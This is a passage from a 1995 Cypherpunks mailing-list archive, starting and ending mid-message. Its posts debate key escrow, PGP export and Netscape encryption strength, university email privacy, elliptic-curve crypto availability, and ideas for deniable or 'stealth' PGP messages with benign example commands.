right not to be forced to speak. By implication, I would argue that I have the right to choose my own channels of communication including my intended audience (and this has been upheld by the Supremes in other contexts). If the Feds want to know what I've written or said (non-publicly) let them subpoena me and I will be happy to tell them to go to hell. If we can deploy technologies to protect our freedom to communicate the way *we* choose to, then we have the right to do so. Beyond rights, we have the power to do so --- which is worth even more. >In other words ... if it took agreement by a review board composed of >non-LEA members of this list, would the escrow be acceptable?? I don't think many of us would feel better if a private party had to approve the invasion of our privacy. DCF "You can ignore all of the rest of bullshit. All that you need to know about an enemy is how many guns and men does he have and can they stand fire." From aleph1 at dfw.net Tue Sep 12 07:58:34 1995 From: aleph1 at dfw.net (Aleph One) Date: Tue, 12 Sep 95 07:58:34 PDT Subject: anyone got a cpunk URL for the UK munitions T? In-Reply-To: <24928.9509120805@exe.dcs.exeter.ac.uk> Message-ID: I would be more than happy to set up a page for it or anyother cypherpunk material at underground.org. I been meaning to do some major updates anyway just been very busy. Aleph One / aleph1 at dfw.net http://underground.org/ On Tue, 12 Sep 1995 aba at dcs.exeter.ac.uk wrote: > So what I was thinking is it would be nice if someone with a permanent > URL, could put a pointer to my URL, that could be updated later, as my > URL moves? > From jya at pipeline.com Tue Sep 12 08:00:21 1995 From: jya at pipeline.com (John Young) Date: Tue, 12 Sep 95 08:00:21 PDT Subject: NRO_puf Message-ID: <199509121500.LAA08738@pipe2.nyc.pipeline.com> 9-12-95. NYPaper: "Spy Satellites' Early Role As 'Floodlight' Coming Clear." Corona. Everything about it was beyond top secret -- its name and history, builders and operators, cameras and orbits, photographs and interpreters and, most important of all, what it snooped on from space. It was officially and assiduously treated for decades as if it did not exist. The 95 Corona satellites that successfully conducted espionage from 1960 to 1972 turn out to have been remarkably advanced tools whose development, far from the work of an inner circle, drew on the nation's top scientific and industrial talent. More important, the new disclosures show just how greatly the craft revolutionized Washington's ability to understand its cold war friends and enemies. Sergei Khrushchev, son of the Soviet leader Nikita S. Khrushchev, told the Itek conference that one Corona film pod dropped into a Russian forest, where ax-wielding woodsmen chopped it up. Another spy satellite misdirected its film pod into a field in central Asia, where peasants wrapped the precious Kodak film around poles to provide solitude for a privy. NRO_puf (16 kb) From hfarkas at ims.advantis.com Tue Sep 12 08:00:24 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Tue, 12 Sep 95 08:00:24 PDT Subject: Scientology tries to break PGP - and Message-ID: Repost: the following bounced: ----------------------------------------------------------------------------- On Fri, 8 Sep 1995, Tom Rollins wrote: > If Larry Wollersheim does have the valid key. It would be a simpler > process to know what fake key to use and work it backwards through > the MD5 to arrive at an ascii string to produce the fake key. > > Too bad this wouldn't be plausable for the secret ring. Perhaps PGP > needs an option to specify the key in Hex and make the process easy. Here's another option. I have no idea if it is possible, nor how it would be implemented! PGP could allow for an alternate secret key and a standard "dummy" document from somewhere in your path. A command line option would encrypt for both keys (as if there were 2 recipients) and append the "dummy" document to the end of the target file when encrypting. When the safety is finally removed from the gun at your head (sorry for the drama) you hand over your alternate secret key. If decrypted with the "alternate" or "fake" secret key, the encrypted file is wiped until it reaches a marker; the remainder of the file is displayed. If you use your "primary" or "real key", the extraneous text is simply stripped. Alternately, the "dummy" file could overwrite the "real" message n times, to keep the decrypted file size more realistic. If you are forced to turn over keys some day (and I think there is at least a reasonable likeihood of that) then They will have a much harder time arguing "But that's not what the file *really* said and, deep inside of me, I know it!". At that point, with a secure wipe going on while the "decryption" was taking place, you have done the best you could. I agree- a search warrent gives authorities the right to search your home (or disk)- not a guarantee that they'll find what they're looking for. =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== From jya at pipeline.com Tue Sep 12 08:05:01 1995 From: jya at pipeline.com (John Young) Date: Tue, 12 Sep 95 08:05:01 PDT Subject: VOO_doo Message-ID: <199509121504.LAA09688@pipe2.nyc.pipeline.com> 9-12-95. NYPaper: "Bulletin Board Is Virtual; Hacker Arrests Are Real." It was a classic sting operation, the kind of undercover gambit that has nabbed bad guys for decades. But the meeting place for this subterfuge was not some grimy storefront. It was a computer bulletin board that the United States Secret Service had rigged together to troll for people who are illegally trafficking in the codes that program cellular phones. " 'Innocent' Files Can Carry a Virus." A new kind of computer virus has descended upon the world. How easy is it to create one? Fifteen minutes after opening a Microsoft Word reference manual, I had cranked out a one-line program that could eliminate crucial system files from a hard drive. By bedtime I had figured out how to get this file to transmogrify Word itself so it would embed my trick program in any document it opened. In an evening, I had created a virus of my very own. This is scary stuff. Scarier still is that if I can do it, millions of others can too. Henceforth virtually every document on the information highway must be considered suspect. 2: VOO_doo From kadie at eff.org Tue Sep 12 08:24:04 1995 From: kadie at eff.org (Carl M. Kadie) Date: Tue, 12 Sep 95 08:24:04 PDT Subject: University logging mail to anon.penet In-Reply-To: <199509082239.PAA20081@ix8.ix.netcom.com.810600068> Message-ID: <4348m6$k72@eff.org> stewarts at ix.netcom.com (Bill Stewart) writes: [...] >There may be ECPA issues involved, especially if CalPolySLO is a government- >run university; the sysadmins certainly need to learn some ethics... [...] I think the ECPA should apply to private universities, too. The FERPA also applies to virutally all U.S. private universities. - Carl =============== ftp://ftp.eff.org/pub/CAF/faq/email.privacy =============== q: Can (should) my university monitor my email? a: Ethically (and perhaps legally) email communications should have the same privacy protection as telephone calls. It would be unwise for any university employee to tap email communications without authorization from the university president, university legal counsel, and the academic freedom committee. According to Mike Godwin, legal services counsel for the Electronic Frontier Foundation (EFF), the U.S.'s Electronic Communications Privacy Act (ECPA) could be reasonably construed to protect university email. This is also the reported opinion of the U. of Michigan's lawers. Also, the U.S.'s Family Educational Rights and Privacy Act gives students at all public and most private schools some privacy rights. A U.S. government task force says that "[Email] monitoring [of government employees] of actual communications and communicators may impinge on the Constitutional rights of freedom of speech (1st Amendment), against unreasonable search and seizure (4th Amendment), and against self-incrimination (5th amendment), as well as on the right to privacy, specifically as set forth in both the Privacy Act and the ECPA." In the context of libraries, the American Library Association's Policy on Confidentiality of Library Records suggests this procedure to deal with an official or police request for information about users: 'When drafting local policies, libraries should consult with their legal counsel to insure these policies are based upon and consistent with applicable federal, state, and local law concerning the confidentiality of library records, the disclosure of public records, and the protection of individual privacy. Suggested procedures include the following: 1. The library staff member receiving the request to examine or obtain information relating to circulation or other records identifying the names of library users, will immediately refer the person making the request to the responsible officer of the institution, who shall explain the confidentiality policy. 2. The director, upon receipt of such process, order, or subpoena, shall consult with the appropriate legal officer assigned to the institution to determine if such process, order, or subpoena is in good form and if there is a showing of good cause for its issuance. 3. If the process, order, or subpoena is not in proper form or if good cause has not been shown, insistence shall be made that such defects be cured before any records are released. (The legal process requiring the production of circulation or other library records shall ordinarily be in the form of subpoena "duces tecum" [bring your records] requiring the responsible officer to attend court or the taking of his/her deposition and may require him/her to bring along certain designated circulation or other specified records.) 4. Any threats or unauthorized demands (i.e., those not supported by a process, order, or subpoena) concerning circulation and other records identifying the names of library users shall be reported to the appropriate legal officer of the institution. 5. Any problems relating to the privacy of circulation and other records identifying the names of library users which are not provided for above shall be referred to the responsible officer.' - Carl M. Kadie ANNOTATED REFERENCES (All these documents are available on-line. Access information follows.) ================= law/ecpa.1986.godwin ================= * Privacy -- E-mail -- ECPA - University Site Mike Godwin, legal services counsel for the Electronic Frontier Foundation (EFF), says that the Electronic Communications Privacy Act (ECPA) could be reasonably construed to protect university email. ================= law/ferpa.text ================= * Privacy -- Students -- FERPA (Buckley Ammendment) The full text of the Family Educational Right to Privacy Act (Buckley Amendment). ================= faq/email.policies ================= * Email -- Policies q: Do any universities treat email and computer files as private? a: Yes, many universities treat email and computer files as private. ... ================= library/confidentiality.1.ala ================= * Confidentiality -- 1 (ALA) The American Library Association's "Policy on Confidentiality of Library Records" Suggests how to handle police or official requests for information about a user. ================= library/computer.draft.ala ================= * DRAFT: Access to Electronic ... Services and Networks ... (ALA) A draft interpretation by the American Library Association of the "Library Bill of Rights" Says in part: "Libraries and librarians exist to facilitate [freedom of speech and freedom to read] by providing access to, identifying, retrieving, organizing, and preserving recorded expression regardless of the formats or technologies in which that expression is recorded." ================= statements/bill-of-rights.aahe ================= * Bill of Rights ... for Electronic ... Learners This is the "Bill of Rights and Responsibilities for the Electronic Community of Learners". It could become the first widely endorsed statement directly related to computers and academic freedom. ================= statements/caf-statement ================= * Computer and Academic Freedom Statement -- Draft This is an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. (Critiqued). ================= statements/caf-statement.critique ================= * Computer and Academic Freedom Statement -- Draft -- Critique This is a critique of an attempt to codify the application of academic freedom to academic computers. It reflects our seven months of on-line discussion about computers and academic freedom. It covers free expression, due process, privacy, and user participation. Additional comments and suggestions are very welcome (especially when posted to CAF-talk). All the documents referenced are available on-line. ================= academic/student.freedoms.aaup ================= * Student Freedoms (AAUP) Joint Statement on Rights and Freedoms of Students -- This is the main U.S. statement on student academic freedom. ================= academic/speech-codes.aaup ================= * Speech Codes (AAUP) On Freedom of Expression and Campus Speech Codes Expression - An official statement of the American Association of University Professors (AAUP) It says in part: "On a campus that is free and open, no idea can be banned or forbidden. No viewpoint or message may be deemed so hateful or disturbing that it may not be expressed." ================= law/uwm-post-v-u-of-wisconsin ================= * Expression -- Hate Speech -- UWM Post v. U Of Wisconsin The full text of UWM POST v. U. of Wisconsin. This recent district court ruling goes into detail about the difference between protected offensive expression and illegal harassment. It even mentions email. It concludes: "The founding fathers of this nation produced a remarkable document in the Constitution but it was ratified only with the promise of the Bill of Rights. The First Amendment is central to our concept of freedom. The God-given "unalienable rights" that the infant nation rallied to in the Declaration of Independence can be preserved only if their application is rigorously analyzed. The problems of bigotry and discrimination sought to be addressed here are real and truly corrosive of the educational environment. But freedom of speech is almost absolute in our land and the only restriction the fighting words doctrine can abide is that based on the fear of violent reaction. Content-based prohibitions such as that in the UW Rule, however well intended, simply cannot survive the screening which our Constitution demands." ================= law/gillard-v-schmidt ================= * Privacy -- School -- Staff Desk -- Gillard v. Schmidt Description of an appellate court ruling that the school board could not search the desk of a school counselor without a warrant. ================= law/email.gov-employee ================= * Privacy -- E-mail -- Government Employees A U.S. government task force: "[Email] monitoring [of government employees] of actual communications and communicators may impinge on the Constitutional rights of freedom of speech (1st Amendment), against unreasonable search and seizure (4th Amendment), and against self-incrimination (5th amendment), as well as on the right to privacy, specifically as set forth in both the Privacy Act and the ECPA." Enclosed are guidelines for legitimate monitoring of government employee email. ================= law/mass-student-searches ================= * Privacy -- Mass Students Searches An excerpt from The ACLU Handbook: _The Rights of Students_, stating that "there must a reasonable suspicion directed specifically at each student before a school official can search students." ================= law/constraints.constitutional ================= * Constitution -- Public University -- Constraints Comments from _A Practical Guide to Legal Issues Affecting College Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D. Gehring. (College Administration Publication, 1985). Discusses the constitutional constraints on public universities including the requires for freedom of expression, freedom against unreasonable searches and seizures, due process, specific rules. ================= law/ecpa.umich ================= * Privacy -- E-mail -- ECPA - University Site A summary of a newspaper report that the U. of Michigan's lawyers believe(d) that the institution is barred under the federal Electronic Communications Privacy Act from reading electronic mail. ================= law/privacy.email ================= * Privacy -- E-mail -- Law -- Hernandez "Computer Electronic Mail and Privacy", an edited version of a law school seminar paper by Ruel T. Hernandez. ================= law/privacy.workplace ================= * Privacy -- Workplace Comments from and about _The new hazards of the high technology workplace_ see (1991) 104 _Harvard Law Review_ 1898. Talks about email and other electronic monitoring. ================= law/email.bib ================= * Privacy -- E-mail -- Bibliography I have been having an e-mail conversation with Stacy Veeder for several days on the topic of e-mail privacy. She mailed me this bibliography which she has compiled for two papers which she is currently writing. I post it here with permission. PS - She is interested in talking with anyone who has some views on the topic/information to share. Mark N. ================= ================= If you have gopher, you can browse the CAF archive with the command gopher gopher.eff.org These document(s) are also available by anonymous ftp (the preferred method) and by email. To get the file(s) via ftp, do an anonymous ftp to ftp.eff.org (192.77.172.4), and then: cd /pub/CAF/law get ecpa.1986.godwin cd /pub/CAF/law get ferpa.text cd /pub/CAF/faq get email.policies cd /pub/CAF/library get confidentiality.1.ala cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get gillard-v-schmidt cd /pub/CAF/law get email.gov-employee cd /pub/CAF/law get mass-student-searches cd /pub/CAF/law get constraints.constitutional cd /pub/CAF/law get ecpa.umich cd /pub/CAF/law get privacy.email cd /pub/CAF/law get privacy.workplace cd /pub/CAF/law get email.bib To get the file(s) by email, send email to ftpmail at decwrl.dec.com Include the line(s): connect ftp.eff.org cd /pub/CAF/law get ecpa.1986.godwin cd /pub/CAF/law get ferpa.text cd /pub/CAF/faq get email.policies cd /pub/CAF/library get confidentiality.1.ala cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get gillard-v-schmidt cd /pub/CAF/law get email.gov-employee cd /pub/CAF/law get mass-student-searches cd /pub/CAF/law get constraints.constitutional cd /pub/CAF/law get ecpa.umich cd /pub/CAF/law get privacy.email cd /pub/CAF/law get privacy.workplace cd /pub/CAF/law get email.bib -- Carl Kadie -- I do not represent EFF or my employer; this is just me. =Email: kadie at eff.org, kadie at cs.uiuc.edu = =URL: , = From patrick at Verity.COM Tue Sep 12 08:24:15 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Tue, 12 Sep 95 08:24:15 PDT Subject: PGP in UK - snooped as unSTEALTHed? Message-ID: <9509121520.AA12778@cantina.verity.com> > > MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP I recently got Symantec C++ 7.0 for less than either Microsoft or Borland were selling their packages for. It's a nicer development environment than either as well. It also support DOS/Windows3.x/NT/Chicago. (I don't remember if it supports OS2. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From danisch at ira.uka.de Tue Sep 12 08:27:12 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 12 Sep 95 08:27:12 PDT Subject: Elliptic Curve Public Key Crypto available Message-ID: <9509121500.AA03172@elysion.iaks.ira.uka.de> Available anywhere outside the escrowed country ? From weld at l0pht.com Tue Sep 12 08:34:30 1995 From: weld at l0pht.com (Weld Pond) Date: Tue, 12 Sep 95 08:34:30 PDT Subject: Netscape to patch shareware version Message-ID: This is from the Sept 11, 1995 Inter at ctive Week: Netscape Communications Corp.'s freely distributed browser is getting commercial-grade encryption, making it safe to use in the U.S. The change comes two weeks after Inter at ctive Week disclosed that the free version contained reletively weak encryption that had been cracked by a European user. [...] Meanwhile, in an as yet unannouced move, the company said it would place its commercial browser online for free downloading. THat move apparently comes in direct response to an Inter at ctive Week article that highlighted the fact that all shareware versions of the browser contain the so-called 40-bit key encryption software which was recently proven insecure. THe commercial version, sold only in the U.S. contains an unbreakable 128-bit encryption scheme. Netscape said it received word last week that the State Department had cleared that version for release on the Net, but only within the U.S., owing to current export laws banning the export of encryption schemes stronger than 40 bits. THe company could provide no details by press time on how it would ensure that the 128-bit version wouldn't leak beyond U.S. borders. [end excerpts] I love how Inter at ctive Week pats themselves on the back for making people aware of the problem. I guess the cypherpunk media hacking is working. Doing things behind the scenes and making the press think they are the internet users salvation looks like a good tactic. The cypherpunks forced a situation where Net users now have better encryption available to them. I'd say this is a big win. Weld Pond - weld at l0pht.com - http://www.l0pht.com/~weld L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From adwestro at ouray.cudenver.edu Tue Sep 12 08:59:10 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Tue, 12 Sep 95 08:59:10 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com> Message-ID: <6aaVwkkAseQS084yn@ouray.cudenver.edu> -----BEGIN PGP SIGNED MESSAGE----- On Sat, 02 Sep 1995, "Perry E. Metzger" wrote: > Alan Westrope writes: [replying to M. Froomkin about statute of limitations for prz] > > June '96. Zimmermann and Dubois appeared on a local talk radio show > > recently; a friend happened to catch the program, taped it, and played > > excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois. > That's not possible. The offense in question took place on or before > September 8, 1992, and the statute of limitations is, to my knowledge, > three years. Even if it were four years, it would have to be September > 8th of that year. Branko Lankester announced availability of PGP 2.0 > on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that > he exported PGP Version 1.0 to the team that developed PGP 2.0 > overseas, any export that Phil performed would have of necessity to > have taken place before then. Perry's response and Brian Davis' remarks about prosecutorial "creativity" prompted me to ask Phil Dubois for clarification. (I told him I would probably pass his reply along to the list, so I'm not violating email confidentiality here.) Here's the relevant snippet: ======================================================================== I believe that the statute expires in June of '96, because there is a five-year statute on the export-violation allegation and because PGP was released in June of '91, and whoever exported it did so shortly after the release. It is true, however, that prosecutors have been very creative in extending the statute when they've felt the need to do so. We can only hope that DOJ will not feel the need in this case. ======================================================================== I also feel Phil will be largely off the hook by June. It would be damn silly to prolong the matter, especially since the complete source code has been published internationally in OCR format now. Also, I expect the Feds would rather focus their "creative" energies on the Bernstein/EFF export issue. But who knows what anti-crime hysteria might be whipped up in an election year, or who it might become handy to demonize, etc. Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: I *swear* I have not used the term 'big-endian' in the last 10 years. iQCVAwUBMFWsMlRRFMq4NZY5AQHTgQP8DFDKtcK3JfFffURlwwXP+o+PMkk57dO2 baWIaBBSRxp0pUivP+vVDSP1NwMhpRDt+apW10qCgemJWgGlg8f2NRW6rq2LgpfJ 1fuJJL/mLQo2W+UfGqQS8PFv3CwvFLdE1hEMQfysFGo3UY2nYOeuMe8vJdednFP2 MSm7B2e9JcM= =SOsn -----END PGP SIGNATURE----- From ylo at cs.hut.fi Tue Sep 12 09:17:52 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Tue, 12 Sep 95 09:17:52 PDT Subject: Elliptic Curve Public Key Crypto available In-Reply-To: <9509121500.AA03172@elysion.iaks.ira.uka.de> Message-ID: <199509121617.TAA06025@shadows.cs.hut.fi> > Available anywhere outside the escrowed country ? See http://www.cs.hut.fi/crypto/software.html#eliptic It was in Italy (ftp.dsi.unimi.it) earlier today... Tatu From talon57 at well.com Tue Sep 12 09:20:43 1995 From: talon57 at well.com (Brian D Williams) Date: Tue, 12 Sep 95 09:20:43 PDT Subject: Elliptic Curve Public Key Crypto Message-ID: <199509121620.JAA08381@well.com> Mike Rosing writes: >in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii >files. One contains code and the other contains documentation: >eliptic.src and elliptic.doc. The code portion is a cat'ed block >of files: headers, C sources and a set of prime numbers. The >documentation attempts to explain the math, but it does help if >you already know number theory. It hopefully isn't necessary. Thanks Mike for all your effort!! Now could someone remind me where the Cypherpunks FTP site is? Please? Brian D Williams Cypherpatriot " Zen? Well it beats sitting around on your ass all day doing nothing! " From andrew_loewenstern at il.us.swissbank.com Tue Sep 12 09:29:17 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 12 Sep 95 09:29:17 PDT Subject: Digital Fingerprinting Message-ID: <9509121627.AA00538@ch1d157nwk> > I said I'd mention "state secrets" again. The usual example for > making subtle modifications to documents to see who leaked it is > the intelligence community, which gave us the term "barium" (because > the changes look like barium in an x-ray diagnostic). Such technology would be very useful in business, especially the high-tech industry. Think of how many non-disclosure agreements are signed every day relating to new products developed for the software industry alone. Many companies are very paranoid and already 'fingerprint' information by using unique code-names for projects, for instance. i.e. the spec sheet on their new GAK crypto product they give to Alice may be code-named 'project foobar' but the one they give to Bob may be code-named 'project burris'... Then, when the information leaks out they check which person they gave the document with that code-name and they know who to sue (or at least not give any more trade-secrets to). It's very simplistic but it has been know to work in the past. Most of the real technology for doing this is much better, of course... However, what stops you from printing out a fingerprinted document and scanning it back in, for instance? andrew From klp at gold.tc.umn.edu Tue Sep 12 09:48:44 1995 From: klp at gold.tc.umn.edu (Kevin L Prigge) Date: Tue, 12 Sep 95 09:48:44 PDT Subject: Elliptic Curve Public Key Crypto In-Reply-To: <199509121620.JAA08381@well.com> Message-ID: <3055b9ac3c42002@noc.cis.umn.edu> A little birdie told me that Brian D Williams said: > > Now could someone remind me where the Cypherpunks FTP site is? > ftp://ftp.csua.berkeley.edu/pub/cypherpunks -- Kevin Prigge | Holes in whats left of my reason, CIS Consultant | holes in the knees of my blues, Computer & Information Services | odds against me been increasin' email: klp at cis.umn.edu | but I'll pull through... From bal at martigny.ai.mit.edu Tue Sep 12 09:57:03 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Tue, 12 Sep 95 09:57:03 PDT Subject: Famous Zen koan: what is the sound of two shoes dropping? Message-ID: <9509121656.AA18132@toad.com> You may recall that Dorothy Denning had a pro-Clipper article in _Technology Review_ back in July. The October issue of TR contains not only some critical letters to the editor, but also a reply from Denning. How things have changed over the last 18 months... --bal ------- Start of forwarded message ------- Date: Tue, 12 Sep 95 12:23:00 -0400 Return-Path: From: Hal Abelson To: bal at martigny.ai.mit.edu Subject: Famous Zen koan: what is the sound of two shoes dropping? What is the sound of two shoes dropping? **Part 1: March 10, 1994 (From the debate between Dorothy Denning and John Perry Barlow, moderated by Philip Elmer-DeWitt) Barlow: EFF is not asking the Government to drop Clipper, though we would vastly prefer they did. We're merely asking that no steps be taken to require it either by law or practice...as, for example, would be the case if you had to use a Clipper chip to file your tax return. DeWitt: Dr. Denning, do you think this is the "first step in a process to outlaw crypto"? Denning: No I do not. ***Part 2: October 10, 1995 (From Dorothy Denning's response to letters to the editor in _Technology Review_) Denning: But critics make an important point when they argue that criminals will not use Clipper or other forms of key escrow encryption. As long as there are no laws in the United States controlling the sale and distribution of encryption products, the U.S. market will be flooded with products that have no provisions for government access. This eventual threat to public safety and social order could be avoided by establishing a licensing program for encryption products that reasonably satisfy the government's decryption requirements and do not interoperate with unlicensed systems. While the manufacture and distribution of unlicensed encryption products would be illegal, no particular system would be mandatory and any licensed product could be used without restriction. Although such a licensing program would not prevent criminals from using unlicensed products, their availability would be limited to underground channels. ------- End of forwarded message ------- P.S. Denning's TR article is available at: http://web.mit.edu/afs/athena/org/t/techreview/www/articles/july95/Denning.html From Andrew.Spring at ping.be Tue Sep 12 10:02:58 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Tue, 12 Sep 95 10:02:58 PDT Subject: GAK/weak crypto rationale? Message-ID: >intercepts requested and authorized in the past year. As I recall, the >number was quite small - around 12K [?]. Someone had found this out >through an FOIA request, perhaps, (my recollection of it is poor). It was I think it's about 1200. >not a large number, anyway. I must conclude that the actual number of >intercepts is much, much larger than they are saying, and that they must >be getting what they perceive to be good intel from all this snooping. > A more cautious conclusion would be would be that the importance (to the LEA's) of the busts made with crypto is much larger than the numbers suggest. You could interpret that a lot of ways: I suspect that high-profile career-enhancing cases are highly dependent on wiretaps. From andrew_loewenstern at il.us.swissbank.com Tue Sep 12 10:03:01 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 12 Sep 95 10:03:01 PDT Subject: Elliptic Curve Public Key Crypto available Message-ID: <9509121658.AA00550@ch1d157nwk> > Previous to the availabilty of 100 MHz processors this method of > public key crypto was ridculously slow. The only versions were > laboratory curiosities implemented in ASIC hardware. Code, if it > exists, is not in the public domain. What about NeXT's Fast Elliptic Encryption (FEE)? Their research guy, Richard Crandall, came up with major speedups to elliptic curve encryption. In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP 2.0. What was most interesting about this system was that it didn't store any keys anywhere; your public/private key pair was generated _on the fly_ from your passphrase every time you encrypted or decrypted....on a 25mhz 68040 too... and it was fast! It wasn't that great of an implementation (you _really_ need a lot of bits of entropy in that passphrase, and you can't change your passphrase without changing your PK), but it shows how fast NeXT's speedups are. And this was in 1990... I'm not sure if the speedups are patented, but you could try a literature search. If it really is fast then it could mean good things for servers that need to do a lot of enrcyption/decrption for interaction with clients. andrew From ian at bvsd.k12.co.us Tue Sep 12 10:27:17 1995 From: ian at bvsd.k12.co.us (Ian S. Nelson) Date: Tue, 12 Sep 95 10:27:17 PDT Subject: GAK/weak crypto rationale? In-Reply-To: Message-ID: <199509121726.LAA27609@bvsd.k12.co.us> > > >intercepts requested and authorized in the past year. As I recall, the > >number was quite small - around 12K [?]. Someone had found this out > >through an FOIA request, perhaps, (my recollection of it is poor). It was > > I think it's about 1200. > > >not a large number, anyway. I must conclude that the actual number of > >intercepts is much, much larger than they are saying, and that they must > >be getting what they perceive to be good intel from all this snooping. > > > > A more cautious conclusion would be would be that the importance (to the > LEA's) of the busts made with crypto is much larger than the numbers > suggest. You could interpret that a lot of ways: I suspect that > high-profile career-enhancing cases are highly dependent on wiretaps. It could also be argued that the number of busts and wire taps will go up dramatically as more and more people begin to use communications in more integrated ways with thier life and career. It is kind of a fallacy, but communications does seem to be a rapidly growing market. I imagine the folks who push for that sort of crap are thinking of the future, else we'd already have it. From aba at dcs.exeter.ac.uk Tue Sep 12 10:33:50 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 12 Sep 95 10:33:50 PDT Subject: Returned mail: User unknown In-Reply-To: <199509121728.SAA16313@hermes> Message-ID: <26561.9509121731@exe.dcs.exeter.ac.uk> [whoops mispelled cpunks on cc line 1st time, sorry for 2 copies] Perry Metzger wrote: > Gary Jeffers writes: > > Well, I just used MIT's PGP 2.6.2 with 3 different users' public > > keys to encrypt 3 different files. In all 3 files, the first 3 > > characters were the same (an umlauted A, then an i with an up arrow > > over it, and then a heart). This beginning 3 character string is > > apparently the infamous PGP RSA signature. The signature that says > > to spooks' programmed encryption sniffers - "HEY! I'M PGP - GIVE ME > > A LOOK!." > > As if they couldn't figure it out anyway. It isn't an "RSA signature" > by the way. Read format.doc sometime. Yeah, that's what stealth does, removes the boiler plate stuff saying, various things, such as pgp version number, rsa encrypted message, conventional idea block, and as Perry says, it's all in pgformat.doc in the PGP docs directory. > > When are the PGP designers and coders going to get serious and de- > > velope STEALTH PGP inside PGP itself!? > > Never, I hope. It would dramatically lower the utility of the > system. Can you imagine how disgusting it would be to try decrypting > something if you have a dozen keys outstanding? Not to mention how > hard it would be to deal with figuring out that you should even try to > decrypt things in the first place. I reckon it would be a very nice utility, built into pgp as an *option*, some countries it isn't legal to use PGP, and it hasn't been ruled out that the US may not be the next to join the list, all this GAK stuff, son of Clipper, it is a distinct possibility that the law enforcement lot might outlaw other crypto wiht mandatory GAK. Then stealth features for PGP become important for incorporating into stego, of course you can argue that well stealth should be part of the stego app then. It shouldn't be a problem unless it was enforced, as an option I see no problem with it, and lots of possible future advantages even. I'm trying to work on stealth2.1, modifing Henry Hastur's stealth util to added Hal Finney's algorithm for improving the stealthiness (it's not enough to just strip the headers as stealth1.x does, the fact that the RSA encrypted header is always < N, the rsa modulus gives the game away with a few messages to analyse for statistical purposes, ie if you see a lot messages < N, where N is by definition not an even power of 2, and possibly even N is known, or suspected from keyservers). I've been delaying releasing it because I was worrying about ran no generators being good enough, but I think I might have convinced myself that it is not even necessary to use ran no generators, I'd appreciate it if some folks with a bit of crypto expertise could cast their eye over the description below. > > So what, -that "only a few companies" will be discovered to be using PGP > > through the RSA signature!? Those few companies are the seeds for the > > vast numbers of companies that would follow them in using PGP over the > > Internet. The RSA signature is the flag that allows the spooks to easily > > net the bold first companies. The RSA signature is greatly impeding the > > spread of PGP use over the Internet. PGP MUST BE STEALTHED!! > > It isn't an RSA signature. Its a bunch of magic numbers. > > Look, get real already. If someone sees a bunch of random numbers in > mail sent by me, its going to be pretty obvious what the hell is > inside anyway. Yeah, but you wouldn't do it that way. I reckon this is what you'd do: % pgp -es duress % pgp -es msg % stealth < msg.pgp > msg.stl % cat msg.stl >> duress.pgp % pgp +makerandom=1234 noise % cat noise >> duress.pgp % pgp -a duress.pgp % mail someone < duress.asc The pgp +makerandom= is an undocumented feature of pgp > 2.6 (not sure exactly when it got added, Colin Plumb pointed it out when I asked him about ran nos for stealth). So what this means is that you are using PGP it's self to hide a stegoed message. This would be good for the guy from FACTnet (forgotten his name) who just got hit by the CoS, he could hold out for a while, then give up his key, the duress message would appear, and the real message would be explained by having a script to do this on his HD, and having long since burned the disk with a script to do the above on it: % pgp -es msg % pgp +makerandom=4567 noise % cat noise >> msg.pgp % pgp -a msg.pgp % mail someone < msg.asc ie the idea is that you pad your message to a 